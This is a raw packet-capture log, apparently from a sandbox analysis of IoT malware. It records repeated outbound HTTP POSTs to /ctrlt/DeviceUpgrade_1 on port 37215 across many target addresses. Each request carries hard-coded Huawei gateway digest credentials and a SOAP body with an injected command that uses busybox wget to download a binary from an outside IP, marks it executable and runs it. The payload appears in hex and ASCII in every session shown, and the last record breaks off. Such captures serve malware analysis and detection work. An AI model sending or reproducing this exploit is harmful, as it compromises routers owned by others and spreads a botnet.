68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            852192.168.2.155490441.223.17.10637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.741883039 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            853192.168.2.154453441.127.57.22637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.741902113 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            854192.168.2.154010641.8.194.22537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.741902113 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            855192.168.2.154204641.114.43.7937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.741926908 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            856192.168.2.155540241.239.137.8337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.741966009 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            857192.168.2.153506841.26.159.22737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.741976023 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            858192.168.2.153645841.71.82.14837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.741996050 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            859192.168.2.154844041.31.235.20437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.742022991 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            860192.168.2.154036241.121.154.17037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.742041111 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            861192.168.2.153915441.225.193.15937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.742073059 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            862192.168.2.155591241.138.214.19937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.742127895 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
